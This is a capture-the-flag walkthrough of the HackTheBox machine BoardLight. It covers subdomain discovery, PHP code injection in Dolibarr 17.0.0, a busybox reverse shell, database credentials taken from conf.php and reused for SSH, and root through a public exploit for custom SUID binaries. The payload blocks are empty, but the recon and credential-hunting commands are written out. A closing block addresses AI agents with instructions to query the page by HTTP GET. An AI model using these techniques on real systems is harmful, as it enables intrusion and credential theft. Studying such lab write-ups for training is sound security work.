# BoardLight {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Summary In this challenge, we exploited a vulnerability in Dolibarr CRM (version 17.0.0), allowing us to execute PHP code via an unsanitized input in the websites module. After gaining access as `www-data`, we discovered credentials in the `conf.php` file and reused them to log in as `larissa` via SSH. Further enumeration revealed custom SUID binaries, which we exploited to escalate privileges to root and retrieve the final flag. ## Recon We start with an Nmap scan and find only two open ports. We have SSH available on port `22` and an Apache web server is running on port `80`.

When visiting the end point, we only find a static page.

Our directory scan with Feroxbuster also seems to confirm this. However, we also see that this is a PHP server.

But we still find something useful on the static page. In the 'About Shop' section, we find an info mail that reveals a domain. We add this to our `/etc/hosts`.

With a sub domain scan using FFuF we find the subdomain `crm`. {% code overflow="wrap" %} ``` ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://board.htb/ -H "Host:FUZZ.board.htb" -fw 6243 ``` {% endcode %}

Dolibarr is an open-source ERP (Enterprise Resource Planning) and CRM (Customer Relationship Management) software designed to help businesses manage various operations like sales, inventory, and accounting. In version `17.0.0`.

## Shell As www-data We try to log in with default credentials and are successful.

We also find a suitable exploit for version 17.0.1 that allows us to execute remote code. {% embed url="" %} > Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: \" %} > ### Vulnerability Summary: > > Users can be granted privileges to add and modify pages in the websites module. Even though there are security settings to only allow HTML/JavaScript/CSS, this can be subverted. Existing checks being to detect PHP content from user-supplied input are insufficient as it only checks for `

We are adding a new page to this:

We then have to define a title and a page namealias.

After we have created the page, we edit the source using '`Edit HTML Source`'.

To verify that we are successful with the exploit, we first use a simple command to check whether we are successful. ```

```

By clicking on the binoculars we are redirected to our created page.

We that the command got succesfully executed.

Next, we set up a listener.

And prepare a payload for a reverse shell using `busybox`. ```

```

After previewing the page we get a connection back. We are `www-data`.

## Shell as larissa When enumerating as `www-data`, we see that the board page belongs to larissa. Maybe we can find useful credentials in one of the config files.

We search for the config file conf.php and find it in `/var/www/html/crm.board.htb/htdocs/conf/conf.php`. ``` find / -type f -name "conf.php" 2>/dev/null ```

In this we find the credentials for the database user.

Fortunately, at least in our case, the credentials were reused. With this password, which we found in `conf.php`, we can gain access to the machine as `larissa` via ssh. In the home directory of `larsissa` we find the first flag.

## Shell as root When enumerating with `larsissa`, the suid binaries stand out. They match the name of the box. These are not the usual binaries found in GTFObins. But they may have vulnerabilities to get a `root` shell using them.

We are able to locate the following exploits of which the latter one actually works. {% embed url="" %} {% embed url="" %} We clone the repository and setup a Python web server to provide the files, alternatively we could have used `scp`.

Next, we just need to download the exploit, change the permission of the script to make it executable and execute it. We are `root` and find the last flag at `/root/root.txt`.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/hackthebox/2024/boardlight.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.